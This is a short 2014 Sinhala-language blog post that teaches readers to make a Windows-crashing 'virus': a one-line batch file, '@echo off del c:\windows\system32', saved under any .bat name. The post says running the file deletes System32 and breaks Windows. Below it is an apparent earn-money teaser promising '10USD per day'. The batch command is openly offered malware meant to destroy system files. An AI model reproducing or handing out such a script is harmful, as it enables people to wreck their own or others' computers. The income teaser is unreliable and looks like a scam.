Thursday, May 22, 2014

Windows Crash වෙන භයානක Virus එකක් හදමු ;)

මේක පොඩි සරල Code එකක්.Note Pad එක අරගෙන පහල තියන Code එක Type කරගන්නකො... 


@echo off del c:\windows\system32



ඒක ඔයාල කැමති නමකින් save කරගන්න පුළුවන්  හැබැයි නම අගට .bat කියල දෙන්න ඕන.(Eg: pcworld.bat) මේක හදල ඉවර වෙලා open කරන්න යන්න නම් එපා. මේකෙන්ඔයාගෙ පරිගණකයේ System32 File එක Delete කරනවා.Windows Crash වෙනවා.කොහොමද එතකොට .ආයේ windows install කරන්න ආසාවක්‌ තියෙනවනම් මේක Run කරලා බලන්න .computer එක Format කරන වෙලාවක ඔයාලට මේක Run කරලා බලන්න පුළුවන් කොහොමද කියල  .

 

No comments:

Post a Comment

How to Earn Money With PipLogo- 10USD Per Day Without Invest

This Site can Earn 10USD per Day.  5USD for free if u creat New account. Payemnts can withdraw with Neteller Skrill Payza Bitcoin Visa. ...